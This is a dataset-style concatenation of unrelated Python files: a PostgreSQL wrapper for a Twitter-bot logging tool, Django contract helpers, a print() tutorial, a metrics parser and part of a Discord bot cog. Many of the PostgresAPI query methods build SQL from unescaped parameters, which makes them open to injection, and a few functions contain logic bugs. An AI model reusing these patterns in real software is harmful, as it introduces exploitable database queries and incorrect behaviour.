cursor.close()
except psycopg2.Error as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW TWEET <{data}>: ")
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
return {"success": True}
def insert_user(self, data):
self.list_of_users.append(data)
def __save_user(self, data):
"""
Attempts to insert a new User item into the database
@param data: The collection we want to insert the document into
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
cursor = self.conn.cursor()
cursor.execute(
"INSERT INTO users (timestamp, user_id, followers, following, protected) values (DEFAULT,%s,%s,%s,%s);",
(data["user_id"], data["followers"], data["following"], data["protected"])
)
self.conn.commit()
signal.send(sender=PostgresAPI, table_name="users")
cursor.close()
except psycopg2.Error as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW USER <{data}>: ")
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
return {"success": True}
def save_all(self):
"""Method to bulk save all tweets and users"""
for tweet in self.list_of_tweets:
self.__save_tweet(tweet)
self.list_of_tweets = []
log.info("Save all tweets")
for user in self.list_of_users:
self.__save_user(user)
self.list_of_users = []
log.info("Save all users")
def search_tweet(self, params=None):
"""
Searches and returns all Tweets if no data is specified, or the specific tweet matching the given parameters
@param params: The parameters we want to query
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = "select timestamp, tweet_id, likes, retweets from tweets "
if params is None:
query += ";"
else:
query += "WHERE "
control = 0
if "tweet_id" in params.keys():
query += "tweet_id = " + str(params["tweet_id"])
control = 1
if "likes" in params.keys():
if control == 1:
query += " AND "
query += "likes = " + str(params["likes"])
control = 1
if "retweets" in params.keys():
if control == 1:
query += " AND "
query += "retweets = " + str(params["retweets"])
query += ";"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append(
{"timestamp": tuple[0], "tweet_id": int(tuple[1]), "likes": tuple[2], "retweets": tuple[3]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_user(self, params=None):
"""
Searches and returns all Users if no data is specified, or the specific tweet matching the given parameters
@param params: The parameters we want to query
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = "select timestamp, user_id, followers, following, protected from users "
if params is None:
query += ";"
else:
query += "WHERE "
control = 0
if "user_id" in params.keys():
query += "user_id = " + str(params["user_id"])
control = 1
if "followers" in params.keys():
if control == 1:
query += " AND "
query += "followers = " + str(params["followers"])
control = 1
if "protected" in params.keys():
if control == 1:
query += " AND "
query += "protected = " + str(params["followers"])
control = 1
if "following" in params.keys():
if control == 1:
query += " AND "
query += "following = " + str(params["following"])
query += ";"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append({"timestamp": tuple[0], "user_id": int(tuple[1]), "followers": tuple[2],
"following": tuple[3], "protected": tuple[4]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_logs(self, params=None, limit=None):
"""
Searches and returns all logs if no data is specified, or the specific logs matching the parameters. Can also
specify the amount of logs to be retrieved. Data retrieved is ordered by the most recent
@param params: The parameters we want to query. Right now only bot_id is supported
@param limit: An optional parameter specifying the amount of logs to be retrieved
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = "select id_bot, action, target_id, timestamp from logs "
if params is not None:
query += "WHERE "
if "bot_id" in params:
query += f"id_bot={params['bot_id']} AND "
if "target_id" in params:
query += f"target_id={params['target_id']} AND "
if "action" in params:
query += f"action='{params['action']}' AND "
if "timestamp" in params:
query += f"timestamp>'{params['timestamp']}' AND "
query = query[:-4]
query += f"ORDER BY timestamp DESC " \
f"{'limit ' + str(limit) if limit is not None else ''} ;"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append(
{"bot_id": int(tuple[0]), "action": tuple[1], "target_id": int(tuple[2]), "timestamp": tuple[3]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_notifications(self, params=None):
try:
cursor = self.conn.cursor()
query = "select notifications.email,notifications.status from notifications"
if params is not None:
query += " WHERE true"
if "email" in params.keys():
query += f" AND notifications.email='{params['email']}'"
if "status" in params.keys():
query += f" AND notifications.status={params['status']}"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for entry in data:
result.append({'email': entry[0], 'status': entry[1]})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def search_policies(self, params=None, limit=None):
"""
Searches and returns all policies if no data is specified, or the specific policies matching the parameters.
Can also specify the amount of poliecies to be retrieved.
@param params: The parameters we want to query. Right now only bot_id is supported
@param limit: An optional parameter specifying the amount of logs to be retrieved
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = f"select policies.api_type,policies.name,params,active,id_policy,policies.filter, policies.bots " \
f"from policies"
if params is not None:
query += " WHERE "
control = 0
if "policy_id" in params.keys():
query += 'policies.id_policy=' + str(params['policy_id'])
control = 1
if "api_name" in params.keys():
if control == 1:
query += " AND "
query += 'api.name=\'' + params['api_name'] + '\''
control = 1
if "filter" in params.keys():
if control == 1:
query += " AND "
query += f"policies.filter='{params['filter']}'"
control = 1
if "bot_id" in params.keys():
if control == 1:
query += " AND "
query += str(params['bot_id']) + '= ANY(policies.bots)'
if "name" in params.keys():
if control == 1:
query += " AND "
query += f"policies.name='{params['name']}'"
query += f"{'limit ' + str(limit) if limit is not None else ''} ;"
cursor.execute(query)
data = cursor.fetchall()
self.conn.commit()
cursor.close()
result = [] # Array of jsons
for tuple in data:
result.append({
"API_type": tuple[0], "name": tuple[1], "params": tuple[2], "active": tuple[3],
"policy_id": int(tuple[4]), "filter": tuple[5], "bots": [int(t) for t in tuple[6]]
})
return {"success": True, "data": result}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def insert_log(self, data):
"""
Attempts to insert a new Log item into the database
@param data: The data of the item we want to insert. Should have
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
cursor = self.conn.cursor()
bot_id = int(data['bot_id'])
insertion_query = "INSERT INTO logs "
if "target_id" in data:
insertion_query += \
f"(id_bot, action, target_id) values {(bot_id, data['action'], int(data['target_id']))};"
else:
insertion_query += f"(id_bot, action) values {(bot_id, data['action'])}; "
cursor.execute(insertion_query)
log.debug(f"Inserted log <{insertion_query}> on database")
except psycopg2.Error as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW LOG <{data}>: ")
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
log.exception(f"ERROR <{error}> INSERTING NEW LOG <{data}>: ")
return {"success": False, "error": error}
self.conn.commit()
cursor.close()
try:
signal.send(sender=PostgresAPI, table_name="Log")
except Exception as error:
log.exception(f"ERROR <{error}> when signaling rest to update cache")
return {"success": True}
def insert_policy(self, data):
"""
Attempts to insert a new Log item into the database
@param data: The data of the item we want to insert.
@return A success or failure message ({success: True/False ; error: None/Error})
"""
try:
if data['api_name'] not in self.api_types:
return {"success": False, "error": "Specified API does not exist"}
if data['filter'] not in self.filters:
return {"success": False, "error": "Specified Filter does not exist"}
cursor = self.conn.cursor()
cursor.execute('select max(id_policy) from policies;')
max_id = cursor.fetchall()[0][0]
cursor.execute(
"INSERT INTO policies (api_type, filter, name, params, active, id_policy, bots) "
"values (%s,%s,%s,%s,%s,%s,%s);",
(data['api_name'], data['filter'], data["name"], data["params"], data["active"], max_id + 1,
data["bots"]))
self.conn.commit()
cursor.close()
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
return {"success": True}
def delete_policy(self, policy_id):
"""
Deletes the policy with the given id
@param policy_id: The id of the policy we want to delete
@param limit: An optional parameter specifying the amount of logs to be retrieved
@return The query's result or error
"""
try:
cursor = self.conn.cursor()
query = f"delete from policies where id_policy={policy_id};"
cursor.execute(query)
self.conn.commit()
cursor.close()
return {"success": True}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def update_policy(self, policy_id, params):
"""
Updates the policy with the specified policy id, changing the params specified.
@param params: The parameters we want to update.
@param policy_id: The id of the policy we want to update
@param limit: An optional parameter specifying the amount of logs to be retrieved
@return The query's result or error
"""
try:
if 'api_name' in params.keys():
if params['api_name'] not in self.api_types:
return {"success": False, "error": "Specified API does not exist"}
if 'filter' in params.keys():
if params['filter'] not in self.filters:
return {"success": False, "error": "Specified Filter does not exist"}
cursor = self.conn.cursor()
query = f"update policies "
query += " SET "
control = 0
if "api_type" in params.keys():
query += f"api_type='{params['api_name']}'"
control = 1
if "filter" in params.keys():
if control == 1:
query += " , "
query += f"filter='{params['filter']}'"
control = 1
if "name" in params.keys():
if control == 1:
query += " , "
query += 'name=\'' + str(params['name']) + '\''
control = 1
if "params" in params.keys():
if control == 1:
query += " , "
query += 'params=' + str(params['params'])
control = 1
if "active" in params.keys():
if control == 1:
query += " , "
query += 'active=' + str(params['active'])
control = 1
if "bot_id" in params.keys():
if control == 1:
query += " , "
query += 'bots=' + str(params['bots'])
query += f" WHERE id_policy = {policy_id}"
cursor.execute(query)
self.conn.commit()
cursor.close()
return {"success": True}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
def update_notifications_status(self):
cursor = self.conn.cursor()
query = "update notifications set status='f' where status='t'"
try:
cursor.execute(query)
self.conn.commit()
cursor.close()
return {"success": True}
except psycopg2.Error as error:
self.conn.rollback()
return {"success": False, "error": error}
except Exception as error:
self.conn.rollback()
return {"success": False, "error": error}
if __name__ == "__main__":
# TODO: Test and implement searching by timestamp ; Policies API
anal = PostgresAPI()
"""
anal.insert_tweet({"tweet_id": 831606548300517377, "user_id": 6253282, "likes": 100, "retweets": 2})
anal.insert_user({"user_id": 6253283, "followers": 10000, "following": 1234})
for i in anal.search_tweet()["data"]:
print(i)
for i in anal.search_user()["data"]:
print(i)
result = anal.search_policies({'api_name': 'Twitter', 'policy_id': 80, 'bot_id': 1129475305444388866}, limit=10)
if result["success"]:
for i in result["data"]:
print(i)
else:
print(result["error"])
anal.insert_log({"bot_id": 1129475305444388866, "action": "SAVING TWEET (1127597365978959872)"})
anal.insert_log({"user_id": 1129475305444388866, "action": "SAVING TWEET (1127597365978959872)"})
print(anal.insert_policy({'api_name': 'Twitter', 'filter': 'Keywords', 'name': '<NAME> found Ded',
'bots': [1129475305444388866], 'params': ['OMG'], 'active': True, 'policy_id': 421}))
print(anal.update_policy(421, {'api_name': 'Instagram', 'filter': 'Target'}))
result = anal.search_policies({'policy_id': 421})
print(result)
if result["success"]:
for i in result["data"]:
print(i)
else:
print(result["error"])
"""
| StarcoderdataPython |
3299284 | import logging
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
| StarcoderdataPython |
1602233 | from contracts.models import Contract, Offence, Penalty, Termination
import datetime
def get_contract(contract_id):
contract = Contract.objects.get(pk=contract_id)
return contract
def get_penalty(penalty_id):
penalty = Penalty.objects.get(pk=penalty_id)
return penalty
def get_termination(termination_id):
termination = Termination.objects.get(pk=termination_id)
return termination
def get_offence(offence_id):
offence = Offence.objects.get(pk=offence_id)
return offence
def get_all_contracts():
return Contract.objects.all()
def get_all_offences():
return Offence.objects.all()
def get_all_penalties():
return Penalty.objects.all()
def get_active_contracts():
return Contract.objects.filter(status="Active")
def get_terminated_contracts():
return Contract.objects.exclude(status="Active")
def get_employee_contracts(employee):
return Contract.objects.filter(status="Active", employee=employee)
def is_contract_expired(contract):
"""Check if contract is expired"""
return contract.expiry_date > datetime.date.today()
def get_all_terminations():
return Termination.objects.all()
| StarcoderdataPython |
161098 | # coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee <EMAIL> #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
user_name = 'Charlie'
user_age = 8
# 同时输出多个变量和字符串
print("读者名:" , user_name, "年龄:", user_age)
# 同时输出多个变量和字符串,指定分隔符
print("读者名:" , user_name, "年龄:", user_age, sep='|')
# 指定end参数,指定输出之后不再换行
print(40, '\t', end="")
print(50, '\t', end="")
print(60, '\t', end="")
f = open("poem.txt", "w") # 打开文件以便写入
print('沧海月明珠有泪', file=f)
print('蓝田日暖玉生烟', file=f)
f.close() | StarcoderdataPython |
3309146 | from typing import List
from app.core.DatetimeUtils import DatetimeUtils
from app.core.ServiceEntity import ServiceEntity
from app.core.ServiceMethodEntity import ServiceMethodEntity
class ServiceMethodFactory:
@staticmethod
def parse(services: dict, target, prefix):
result = list()
methods = {}
data = target["dataResult"]
data_entities = data["entities"]
for k, v in data_entities.items():
if "SERVICE_METHOD" in k:
tmp = ServiceMethodEntity(prefix)
tmp.name = v
tmp.method_id = k
methods[k] = tmp
elif "SERVICE" in k:
if k not in services:
tmp = ServiceEntity(k, v)
services[k] = tmp
data_points = data["dataPoints"]
for k, v in data_points.items():
service_id, method_id = k.split(",")
method = methods[method_id.strip()]
method.set_service(services[service_id])
for item in v:
stamp_date = DatetimeUtils.convert_from_timestamp(item[0])
if item[1]:
date_key = stamp_date
if date_key in method.points:
raise ValueError('duplicate entry')
else:
method.points[date_key] = item[1]
for k, v in methods.items():
if v.points:
result.append(v)
return result
| StarcoderdataPython |
1728599 | """Definition of the bot's Utility module."""
import asyncio
import random
import re
import sys
import time
import aiohttp
import async_timeout
import discord
import os
import socket
import contextlib
import textwrap
import util.commands as commands
import util.json as json
from contextlib import suppress
from collections import OrderedDict
from datetime import datetime, timedelta
from fnmatch import filter
from io import BytesIO, StringIO
from util.const import _mention_pattern, _mentions_transforms, home_broadcast, absfmt, status_map, ch_fmt, eval_blocked, v_level_map
from util.fake import FakeContextMember, FakeMessageMember
from util.func import bdel, encode as b_encode, decode as b_decode, smartjoin
from util.asizeof import asizeof
from util.perms import check_perms, or_check_perms
import util.dynaimport as di
from .cog import Cog
for mod in ['unicodedata', 'elizabeth',
'qrcode', 'warnings', 'tesserocr', 'base64']:
globals()[mod] = di.load(mod)
mclib = di.load('util.mclib')
xkcd = di.load('util.xkcd')
have_pil = True
try:
from PIL import Image, ImageOps
except ImportError:
have_pil = False
VALID_CHARS = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789')
class Utility(Cog):
"""Random commands that can be useful here and there.
Settings, properties, and other stuff can be found here.
"""
def __init__(self, bot):
self.stopwatches = {}
super().__init__(bot)
self.logger = self.logger.getChild('utility')
@commands.command(pass_context=True, no_pm=True)
async def icon(self, ctx):
"""Retrive the current server's icon.
Usage: icon"""
sname = '**' + ctx.message.server.name + '**'
iurl = ctx.message.server.icon_url
if iurl:
await self.bot.say('Here is the link to the icon for ' + sname + ': <' + iurl + '>')
else:
await self.bot.say('The current server, ' + sname + ', does not have an icon set! :slight_frown:')
@commands.command(pass_context=True, aliases=['echo'])
async def say(self, ctx, *, stuffs: str):
"""Repeat your message.
Usage: say [message]"""
if not self.bot.selfbot:
try:
await self.bot.delete_message(ctx.message)
except discord.Forbidden:
pass
await self.bot.say(stuffs.replace('@everyone', '@\u200beveryone').replace('@here', '@\u200bhere')[:2000])
@commands.command(pass_context=True, aliases=['whois', 'who', 'userinfo', 'uinfo', 'u'])
async def user(self, ctx, *users: str):
"""Get tons of info on an user or some users.
Spaces, multiuser, and cross-server IDs work.
Usage: user {user(s)}"""
targets = []
s = ctx.message.server
if users: # huge complicated mess for spaces,
# multiuser, nicknames, mentions, IDs,
# names, and more in one go.
members = {}
for i in getattr(s, 'members', []):
members[i.mention] = i
members[i.id] = i
members[i.display_name] = i
members[i.name] = i
members[str(i)] = i
for i in users:
try:
member = s.get_member(i)
except AttributeError:
try:
member = await self.bot.get_user_info(i)
except discord.HTTPException:
member = None
if member:
targets.append(member)
else:
try:
member = await self.bot.get_user_info(i)
except discord.HTTPException:
member = None
if member:
targets.append(member)
names = []
_i = 0
while _i < len(users):
names.append(users[_i])
with suppress(KeyError):
if ' '.join(names) in members:
targets.append(members[' '.join(names)])
names = []
elif _i + 1 == len(users):
targets.append(members[users[0]])
_i = -1
users = users[1:]
names = []
_i += 1
if not targets:
await self.bot.say('**No matching users, try again! Name, nickname, name#0000 (discriminator), or ID work. Spaces do, too!**')
return
else:
targets.append(ctx.message.author)
targets = list(OrderedDict.fromkeys(targets))
for target in targets:
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
d_name = target.display_name
try:
t_roles = target.roles
except AttributeError:
t_roles = []
try:
t_game = target.game
except AttributeError:
t_game = None
b_roles = []
c_srv = False
c_sown = False
try:
tg_ctx = FakeContextMember(FakeMessageMember(target), self.bot)
except AttributeError:
tg_ctx = None
else:
c_srv = check_perms(tg_ctx, ('manage_server',))
c_sown = check_perms(tg_ctx, ('server_owner',))
c_own = target.id == self.bot.owner_user.id
c_adm = target.id in self.bot.store['bot_admins']
is_server = isinstance(target, discord.Member)
if c_own:
b_roles.append('Bot Owner')
if c_adm:
b_roles.append('Bot Admin')
if c_srv:
b_roles.append('Server Admin')
with suppress(ValueError, AttributeError):
t_roles.remove(target.server.default_role)
r_embed = discord.Embed(color=random.randint(0, 256**3-1))
r_embed.set_author(name=str(target), icon_url=avatar_link, url=avatar_link)
r_embed.set_thumbnail(url=avatar_link) #top right
r_embed.set_footer(text=str(target), icon_url=avatar_link)
r_embed.add_field(name='Nickname', value=('No nickname set 😦' if d_name == target.name else d_name))
r_embed.add_field(name='User ID', value=target.id)
r_embed.add_field(name='Creation Time', value=target.created_at.strftime(absfmt))
r_embed.add_field(name='Server Join Time', value=target.joined_at.strftime(absfmt) if is_server else 'Couldn\'t fetch')
r_embed.add_field(name='Server Roles', value=', '.join([str(i) for i in t_roles]) if t_roles else 'User has no server roles 😦')
r_embed.add_field(name='Bot Roles', value=', '.join(b_roles) if b_roles else 'User has no bot roles 😦')
r_embed.add_field(name='Status', value=status_map[str(target.status)] if is_server else 'Couldn\'t fetch')
try:
r_embed.add_field(name='Currently Playing', value=(str(t_game) if t_game else 'Nothing 😦'))
except TypeError:
r_embed.add_field(name='Currently Playing', value='Nothing 😦')
await self.bot.say(embed=r_embed)
@commands.command(pass_context=True, aliases=['server', 's', 'sinfo', 'infos', 'guildinfo', 'guild', 'ginfo', 'infog'], no_pm=True)
async def serverinfo(self, ctx):
"""Get loads of info about this server.
Usage: serverinfo"""
target = self.bot.user
s = ctx.message.server
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
ach = s.channels
chlist = [len(ach), 0, 0]
for i in ach:
if i.type == discord.ChannelType.text:
chlist[1] += 1
else:
chlist[2] += 1
iurl = s.icon_url
s_reg = str(s.region)
r_embed = discord.Embed(color=random.randint(0, 256**3-1))
if iurl:
thing = {'url': iurl}
else:
thing = {}
r_embed.set_author(name=s.name, **thing, icon_url=(iurl if iurl else avatar_link))
r_embed.set_footer(text=str(target), icon_url=avatar_link)
if iurl:
r_embed.set_image(url=iurl)
r_embed.add_field(name='ID', value=s.id)
r_embed.add_field(name='Members', value=len(s.members))
r_embed.add_field(name='Channels', value=ch_fmt.format(*[str(i) for i in chlist]))
r_embed.add_field(name='Roles', value=len(s.roles))
r_embed.add_field(name='Custom Emojis', value=len(s.emojis))
r_embed.add_field(name='Region (Location)', value=str(s.region).replace('-', ' ').title().replace('Eu ', 'EU ').replace('Us ', 'US ').replace('Vip', 'VIP '))
r_embed.add_field(name='Owner', value=str(s.owner))
r_embed.add_field(name='Default Channel', value=f'<#{s.default_channel.id}>\n(#{s.default_channel.name})')
r_embed.add_field(name='Admins Need 2FA', value=('Yes' if s.mfa_level else 'No'))
r_embed.add_field(name='Verification Level', value=v_level_map[str(s.verification_level)])
await self.bot.say(embed=r_embed)
@commands.command(pass_context=True, aliases=['gm', 'goldmine', 'aboutme', 'me', 'about'])
async def info(self, ctx):
"""Get bot info.
Usage: info"""
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
ach = self.bot.get_all_channels()
chlist = [0, 0, 0]
for i in ach:
chlist[0] += 1
if i.type == discord.ChannelType.text:
chlist[1] += 1
else:
chlist[2] += 1
up = await self.bot.format_uptime()
ram = await self.bot.get_ram()
got_conversion = ram[0]
emb = discord.Embed(color=random.randint(0, 256**3-1))
emb.set_author(name=str(target), url='https://khronodragon.com/', icon_url=avatar_link)
emb.set_footer(text='Made in Python 3.6+ with Discord.py %s' % self.bot.lib_version, icon_url='https://upload.wikimedia.org/wikipedia/commons/thumb/c/c3/Python-logo-notext.svg/400px-Python-logo-notext.svg.png')
emb.add_field(name='Servers', value=len(self.bot.servers))
emb.add_field(name='Author', value='Dragon5232#1841')
emb.add_field(name='Uptime', value=up)
emb.add_field(name='Local Time', value=time.strftime(absfmt, time.localtime()))
emb.add_field(name='Git Revision', value=self.bot.git_rev)
emb.add_field(name='Cogs Loaded', value=len(self.bot.cogs))
emb.add_field(name='Command Calls', value=sum(self.bot.command_calls.values()))
emb.add_field(name='Memory Used', value=(str(round(ram[1], 1)) + ' MB (%s MiB)' % str(round(ram[2], 1))) if got_conversion else 'Couldn\'t fetch')
emb.add_field(name='Modules Loaded', value=len(self.bot.modules))
emb.add_field(name='Members Seen', value=len(list(self.bot.get_all_members())))
emb.add_field(name='Channels', value=ch_fmt.format(*[str(i) for i in chlist]))
emb.add_field(name='Custom Emojis', value=len(list(self.bot.get_all_emojis())))
emb.add_field(name='Commands', value=str(len(self.bot.commands)))
emb.add_field(name='ID', value=target.id)
if self.bot.user.id == '2<PASSWORD>':
emb.add_field(name='Invite Link', value='https://tiny.cc/goldbot')
await self.bot.say(home_broadcast, embed=emb)
@commands.cooldown(1, 2.95, type=commands.BucketType.server)
@commands.command(pass_context=True, aliases=['pong', 'delay', 'net', 'network', 'lag', 'netlag', 'latency'])
async def ping(self, ctx):
"""Ping, pong!
Usage: ping"""
begin_time = datetime.now()
msg = await self.bot.send_message(ctx.message.channel, '**Pong!** | I wonder how long this takes...')
await self.bot.edit_message(msg, '**Pong!** | I really do wonder...')
time_diff = datetime.now() - begin_time
await self.bot.edit_message(msg, '**Pong!** Responded in %sms.' % str(round((time_diff.total_seconds() / 2) * 1000, 2)))
@commands.command(pass_context=True, aliases=['ram', 'memory', 'usage', 'mem', 'musage'])
async def uptime(self, ctx):
"""Report the current uptime of the bot.
Usage: uptime"""
up = await self.bot.format_uptime()
ram = await self.bot.get_ram()
got_conversion = ram[0]
ram_final = (' RAM usage is **' + str(round(ram[1], 1)) + ' MB (%s MiB)**.' % str(round(ram[2], 1))) if got_conversion else ''
await self.bot.say(ctx.message.author.mention + ' I\'ve been up for **' + up + '**.' + ram_final)
@commands.command(pass_context=True, aliases=['link', 'invlink', 'addbot', 'botadd'])
async def invite(self, ctx, *rids: str):
"""Generate an invite link for myself or another bot.
Usage: invite {optional: bot ids}"""
ids = list(rids)
msg = []
if not ids:
ids.append(self.bot.user.id)
for iid in ids:
try:
int(iid)
if len(iid) in range(16, 20):
if iid == self.bot.user.id:
msg.append('https://discordapp.com/api/oauth2/authorize?client_id={}&scope=bot&permissions={}'.format(iid, self.bot.perm_mask))
else:
msg.append('https://discordapp.com/api/oauth2/authorize?client_id=%s&scope=bot&permissions=3072' % iid)
else:
msg.append('**Invalid ID **`%s`** (must be 18 numbers)!**' % iid)
except ValueError:
msg.append('**Invalid ID **`%s`** (must be made of numbers)!**' % iid)
if msg:
await self.bot.say('\n'.join(msg))
@commands.command(aliases=['homeland', 'web', 'website', 'webpage'])
async def home(self):
"""Get the link to my homeland.
Usage: home"""
await self.bot.say(home_broadcast)
async def poll_task(self, emojis, msg, poll_table):
while True:
fnr = await self.bot.wait_for_reaction(emoji=emojis, message=msg, check=lambda r, a: not a == msg.server.me)
r = fnr.reaction
if fnr.user not in poll_table[str(r.emoji)]:
poll_table[str(r.emoji)].append(fnr.user)
@commands.cooldown(1, 5, type=commands.BucketType.user)
@commands.command(pass_context=True)
async def poll(self, ctx, *rquestion: str):
"""Start a public poll with reactions.
Usage: poll [emojis] [question] [time in seconds]"""
async def cem_help(emojis, raw_c_emojis, cem_map, c_emojis):
"""Custom emoji helper."""
if raw_c_emojis:
try:
for i in ctx.message.server.emojis:
cem_map[str(i)] = i
except AttributeError:
return
for i in raw_c_emojis:
try:
c_emojis.append(cem_map[i])
except KeyError:
await self.bot.say('**Custom emoji `%s` doesn\'t exist!**' % i)
return
emojis += c_emojis
question = ''
if rquestion:
question = ' '.join(rquestion)
else:
await self.bot.say('**You must specify a question!**')
return
stime = 0.0
cem_map = {}
highpoints = None
try:
stime = float(rquestion[-1:][0])
except ValueError:
await self.bot.say('**You must provide a valid poll time!**')
return
_question = question.split()
del _question[-1:]
question = ' '.join(_question)
try: # UCS-4
highpoints = re.compile(u'[\U00010000-\U0010ffff\u2615]')
except re.error: # UCS-2
highpoints = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
u_emojis = re.findall(highpoints, question)
raw_c_emojis = re.findall(re.compile(r'<:[a-z]+:[0-9]{18}>', flags=re.IGNORECASE), question)
c_emojis = []
emojis = u_emojis
await cem_help(emojis, raw_c_emojis, cem_map, c_emojis)
emojis = list(OrderedDict.fromkeys(emojis))
for ri in emojis:
i = str(ri)
question = question.replace(' ' + i, '')
question = question.replace(i + ' ', '')
question = question.replace(i, '')
question = question.strip()
if not emojis:
await self.bot.say('**You must specify some emojis!**')
return
elif len(emojis) < 2:
await self.bot.say('**You need at least 2 emojis to poll!**')
return
msg_key = ctx.message.author.mention + ' is now polling:\n \u2022 ' + question + '\n'
msg = await self.bot.say(msg_key + '**POLL NOT ACTIVE YET, ADDING REACTIONS.**')
for emoji in emojis:
await self.bot.add_reaction(msg, emoji)
await asyncio.sleep(0.14)
await self.bot.edit_message(msg, msg_key + '**POLL IS NOW ACTIVE. Give it a vote!**')
emojis = list(emojis)
poll_table = OrderedDict((str(i), []) for i in emojis)
task = self.loop.create_task(self.poll_task(emojis, msg, poll_table))
await asyncio.sleep(stime)
task.cancel()
_vote_table = {i: len(poll_table[i]) for i in poll_table}
vote_table = OrderedDict(reversed(sorted(_vote_table.items(), key=lambda t: t[1])))
_totals = '\n'.join([str(i) + ': {0} votes'.format(str(vote_table[i])) for i in vote_table])
winner = max(vote_table, key=vote_table.get)
await self.bot.say('**Poll time is over, stopped! Winner is...** ' + str(winner) + '\nResults were:\n' + _totals)
await self.bot.edit_message(msg, msg_key + '**POLL HAS ALREADY FINISHED.**')
#await self.bot.say('VT `' + str(vote_table) + '`')
@commands.command(aliases=['sw'], pass_context=True)
async def stopwatch(self, ctx):
"""A stopwatch for your convenience."""
author = ctx.message.author
if not author.id in self.stopwatches:
self.stopwatches[author.id] = int(time.perf_counter())
await self.bot.say(author.mention + ' Stopwatch started!')
else:
tmp = abs(self.stopwatches[author.id] - int(time.perf_counter()))
tmp = str(timedelta(seconds=tmp))
await self.bot.say(author.mention + ' Stopwatch stopped! Time: **' + tmp + '**')
self.stopwatches.pop(author.id, None)
@commands.command(pass_context=True, name='id', aliases=['myid', 'sid', 'serverid'])
async def _id(self, ctx):
"""Get all the current scope IDs."""
fmt = '''**ID Party!**
Server ID: `{0.server.id}` (same as default channel ID and @\u200beveryone role ID!)
Channel ID: `{0.channel.id}`
Your ID: `{0.author.id}`
Server Owner\'s ID: `{0.server.owner.id}`
**You can also look up the ID of other people with** `{1.prefix}user [name / id / mention]`**.**'''
if not ctx.message.server:
class C:
id = 'Not applicable'
ctx.message.server = C
await self.bot.say(fmt.format(ctx.message, ctx))
@commands.command(pass_context=True, aliases=['memegen'], hidden=True)
async def meme(self, ctx, *, pre_text: str):
"""Generate a meme!
Usage: meme [top text] [bottom text]"""
char_table = {
'-': '--',
'_': '__',
'?': '~q',
'%': '~p',
'#': '~h', # TODO: make
'/': '~s',
'"': "''",
'\n': ' '
}
for key in char_table:
pre_text = pre_text.replace(key, char_table[key])
pre_text = pre_text.replace(' ', '__bottom__')
pre_text = pre_text.replace(' ', '-')
if '__bottom__' in pre_text:
segments = pre_text.split('__bottom__')
else:
segments = textwrap.wrap(pre_text, width=int(len(pre_text) / 2))
async with aiohttp.ClientSession(loop=asyncio.get_event_loop()) as session:
with async_timeout.timeout(10):
async with session.get('https://memegen.link/api/templates/') as r:
rtext = await r.text()
templates = list(json.loads(rtext).values())
rtemp = random.choice(templates)
meme_url = rtemp + '/' + segments[0] + '/' + segments[1] + '.jpg'
async with session.get(meme_url) as r:
raw_image = await r.read()
await self.bot.send_file(ctx.message.channel, fp=BytesIO(raw_image), filename='meme.jpg')
@commands.command(pass_context=True, aliases=['statistics', 'servers', 'channels', 'members', 'users', 'seen'])
async def stats(self, ctx):
"""Dump some of my stats. Full version = info command.
Usage: stats"""
fmt = '''{0.author.mention} Here are my stats: (get even more with `{1}info`!)
**Servers**: {2}
**Channels**: {3}
**Members**: {4}
**Uptime**: {5}'''
up = await self.bot.format_uptime()
await self.bot.say(fmt.format(ctx.message, ctx.prefix,
len(self.bot.servers),
